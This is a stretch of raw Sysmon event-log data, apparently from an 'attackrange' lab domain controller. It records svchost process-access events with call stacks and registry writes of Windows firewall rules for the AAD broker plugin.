13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.529{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\PolicyVersionDWORD (0x0000021a) 13241300x800000000000000010069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.529{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|M=microsoft.aad.brokerplugin_cw5n1h2txyewy|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|D=C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\|PFN=Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.529{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{3393F051-6B4E-4258-821E-A8987A5563CD}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.529{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{A10D4DE3-67BF-455C-A44D-273C37318D69}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.529{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E5377604-DB25-4307-A8C0-0A271488F7E8}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.514{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{81548956-44CD-4486-B201-D3D33F8A269A}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.514{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{55B4933A-C138-4764-938F-5055146E8A19}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.514{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{110DBCCE-87A7-4BC5-89AC-EEE0BA93F969}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.514{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{41883B19-3CCE-47D0-BE40-E83676998803}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.